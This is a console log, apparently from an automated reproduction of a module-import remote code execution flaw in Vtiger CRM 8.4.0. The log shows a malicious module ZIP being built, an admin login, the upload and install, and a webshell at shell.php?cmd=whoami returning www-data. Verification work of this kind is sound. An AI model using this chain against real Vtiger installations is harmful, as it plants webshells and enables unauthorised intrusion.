[+] Starting Vtiger CRM 8.4.0 module-import RCE reproduction Module rewrite already enabled * Starting MariaDB database server mariadbd ...done. * Starting Apache httpd web server apache2 * * Restarting Apache httpd web server apache2 AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.20.0.4. Set the 'ServerName' directive globally to suppress this message ...done. [+] Malicious module ZIP created: /data/pruva/runs/2ed284d0-13db-43e4-94d1-013b6a33de96/bundle/artifacts/malmod_ModSiUWLcoD/malmod.zip (module=ModSiUWLcoD) [*] Vtiger not installed; running installer [*] Installer finished [*] Logging in as admin [*] Completing SystemSetup [*] Completing UserSetup [*] Authenticated, current page: http://localhost/index.php [*] Navigating to Module Manager import page [*] Uploading malicious module ZIP [+] Upload accepted: file=usermodule_1783465710.zip name=ModSiUWLcoD type=module [*] Installing the module [+] Install response: {"success":true,"result":{"success":true,"importModuleName":"ModSiUWLcoD"}} [*] Triggering webshell: http://localhost/modules/ModSiUWLcoD/shell.php?cmd=whoami [+] Webshell output: 200 PRUVA_SHELL_OK www-data www-data [+] Proof saved to /data/pruva/runs/2ed284d0-13db-43e4-94d1-013b6a33de96/bundle/repro/proof.log [+] Vulnerability confirmed: shell executed via uploaded module [+] Runtime manifest written: /data/pruva/runs/2ed284d0-13db-43e4-94d1-013b6a33de96/bundle/repro/runtime_manifest.json [+] Done